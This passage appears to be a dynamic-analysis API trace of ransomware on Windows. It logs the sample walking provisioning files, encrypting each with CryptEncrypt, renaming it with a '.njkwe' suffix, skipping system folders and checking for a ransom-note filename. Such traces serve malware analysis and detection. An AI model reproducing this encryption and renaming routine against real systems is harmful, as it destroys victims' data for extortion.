Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.105] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\173__Connections_Cellular_TIGO (Honduras)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\173__connections_cellular_tigo (honduras)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.105] GetTickCount () returned 0x11539c9 [0077.105] GetTickCount () returned 0x11539c9 [0077.105] GetTickCount () returned 0x11539c9 [0077.105] GetTickCount () returned 0x11539c9 [0077.105] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.105] GetProcessHeap () returned 0xbe0000 [0077.105] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.105] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x289, lpOverlapped=0x0) returned 1 [0077.107] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd77, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.107] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x289, lpOverlapped=0x0) returned 1 [0077.107] GetProcessHeap () returned 0xbe0000 [0077.107] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.107] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.107] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.107] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.107] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.107] CloseHandle (hObject=0x43c) returned 1 [0077.107] GetProcessHeap () returned 0xbe0000 [0077.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.107] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\173__Connections_Cellular_TIGO (Honduras)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0077.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\173__Connections_Cellular_TIGO (Honduras)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\173__connections_cellular_tigo (honduras)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\173__Connections_Cellular_TIGO (Honduras)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\173__connections_cellular_tigo (honduras)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.108] GetProcessHeap () returned 0xbe0000 [0077.108] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.108] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9069a53c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9069a53c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9069a53c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x282, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="174__Connections_Cellular_CSL (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", cAlternateFileName="174__C~1.PRO")) returned 1 [0077.108] lstrcmpiW (lpString1="174__Connections_Cellular_CSL (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.108] lstrcmpiW (lpString1="174__Connections_Cellular_CSL (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.108] lstrcmpiW (lpString1="174__Connections_Cellular_CSL (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.108] lstrcmpiW (lpString1="174__Connections_Cellular_CSL (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.108] lstrcmpiW (lpString1="174__Connections_Cellular_CSL (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.108] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\174__Connections_Cellular_CSL (Hong Kong SAR)_i0$(__MVID)@WAP.provxml") returned 163 [0077.108] StrStrIW (lpFirst="174__Connections_Cellular_CSL (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.108] lstrcmpW (lpString1="174__Connections_Cellular_CSL (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.109] lstrcmpW (lpString1="174__Connections_Cellular_CSL (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.109] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\174__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.109] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\174__Connections_Cellular_CSL (Hong Kong SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\174__connections_cellular_csl (hong kong sar)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.109] GetTickCount () returned 0x11539d9 [0077.109] GetTickCount () returned 0x11539d9 [0077.109] GetTickCount () returned 0x11539d9 [0077.109] GetTickCount () returned 0x11539d9 [0077.109] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.109] GetProcessHeap () returned 0xbe0000 [0077.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.109] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x282, lpOverlapped=0x0) returned 1 [0077.110] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.111] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x282, lpOverlapped=0x0) returned 1 [0077.111] GetProcessHeap () returned 0xbe0000 [0077.111] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.111] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.111] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.111] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.111] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.111] CloseHandle (hObject=0x43c) returned 1 [0077.111] GetProcessHeap () returned 0xbe0000 [0077.111] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.111] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\174__Connections_Cellular_CSL (Hong Kong SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0077.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\174__Connections_Cellular_CSL (Hong Kong SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\174__connections_cellular_csl (hong kong sar)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\174__Connections_Cellular_CSL (Hong Kong SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\174__connections_cellular_csl (hong kong sar)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.120] GetProcessHeap () returned 0xbe0000 [0077.120] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.120] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906c07a8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x906c07a8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x906c07a8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="175__Connections_Cellular_3 (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", cAlternateFileName="175__C~1.PRO")) returned 1 [0077.120] lstrcmpiW (lpString1="175__Connections_Cellular_3 (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.120] lstrcmpiW (lpString1="175__Connections_Cellular_3 (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.120] lstrcmpiW (lpString1="175__Connections_Cellular_3 (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.120] lstrcmpiW (lpString1="175__Connections_Cellular_3 (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.120] lstrcmpiW (lpString1="175__Connections_Cellular_3 (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.120] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\175__Connections_Cellular_3 (Hong Kong SAR)_i0$(__MVID)@WAP.provxml") returned 161 [0077.120] StrStrIW (lpFirst="175__Connections_Cellular_3 (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.120] lstrcmpW (lpString1="175__Connections_Cellular_3 (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.120] lstrcmpW (lpString1="175__Connections_Cellular_3 (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.120] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\175__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.120] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\175__Connections_Cellular_3 (Hong Kong SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\175__connections_cellular_3 (hong kong sar)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.121] GetTickCount () returned 0x11539d9 [0077.121] GetTickCount () returned 0x11539d9 [0077.121] GetTickCount () returned 0x11539d9 [0077.121] GetTickCount () returned 0x11539d9 [0077.121] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.121] GetProcessHeap () returned 0xbe0000 [0077.121] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.121] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0077.122] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.122] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0077.122] GetProcessHeap () returned 0xbe0000 [0077.122] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.122] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.122] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.123] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.123] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.123] CloseHandle (hObject=0x43c) returned 1 [0077.123] GetProcessHeap () returned 0xbe0000 [0077.123] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.123] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\175__Connections_Cellular_3 (Hong Kong SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.123] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\175__Connections_Cellular_3 (Hong Kong SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\175__connections_cellular_3 (hong kong sar)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\175__Connections_Cellular_3 (Hong Kong SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\175__connections_cellular_3 (hong kong sar)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.123] GetProcessHeap () returned 0xbe0000 [0077.124] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.124] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906c07a8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x906c07a8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x906c07a8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="176__Connections_Cellular_3 (Hong Kong SAR)_i1$(__MVID)@WAP.provxml", cAlternateFileName="176__C~1.PRO")) returned 1 [0077.124] lstrcmpiW (lpString1="176__Connections_Cellular_3 (Hong Kong SAR)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.124] lstrcmpiW (lpString1="176__Connections_Cellular_3 (Hong Kong SAR)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.124] lstrcmpiW (lpString1="176__Connections_Cellular_3 (Hong Kong SAR)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.124] lstrcmpiW (lpString1="176__Connections_Cellular_3 (Hong Kong SAR)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.124] lstrcmpiW (lpString1="176__Connections_Cellular_3 (Hong Kong SAR)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.124] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\176__Connections_Cellular_3 (Hong Kong SAR)_i1$(__MVID)@WAP.provxml") returned 161 [0077.124] StrStrIW (lpFirst="176__Connections_Cellular_3 (Hong Kong SAR)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.124] lstrcmpW (lpString1="176__Connections_Cellular_3 (Hong Kong SAR)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.124] lstrcmpW (lpString1="176__Connections_Cellular_3 (Hong Kong SAR)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.124] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\176__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.124] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\176__Connections_Cellular_3 (Hong Kong SAR)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\176__connections_cellular_3 (hong kong sar)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.124] GetTickCount () returned 0x11539e8 [0077.124] GetTickCount () returned 0x11539e8 [0077.124] GetTickCount () returned 0x11539e8 [0077.124] GetTickCount () returned 0x11539e8 [0077.125] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.125] GetProcessHeap () returned 0xbe0000 [0077.125] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.125] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0077.126] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.126] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0077.126] GetProcessHeap () returned 0xbe0000 [0077.126] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.126] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.126] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.126] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.126] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.126] CloseHandle (hObject=0x43c) returned 1 [0077.127] GetProcessHeap () returned 0xbe0000 [0077.127] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.127] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\176__Connections_Cellular_3 (Hong Kong SAR)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\176__Connections_Cellular_3 (Hong Kong SAR)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\176__connections_cellular_3 (hong kong sar)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\176__Connections_Cellular_3 (Hong Kong SAR)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\176__connections_cellular_3 (hong kong sar)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.127] GetProcessHeap () returned 0xbe0000 [0077.127] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.127] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906c07a8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x906c07a8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x906c07a8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="177__Connections_Cellular_3 (Hong Kong SAR)_i2$(__MVID)@WAP.provxml", cAlternateFileName="177__C~1.PRO")) returned 1 [0077.130] lstrcmpiW (lpString1="177__Connections_Cellular_3 (Hong Kong SAR)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.130] lstrcmpiW (lpString1="177__Connections_Cellular_3 (Hong Kong 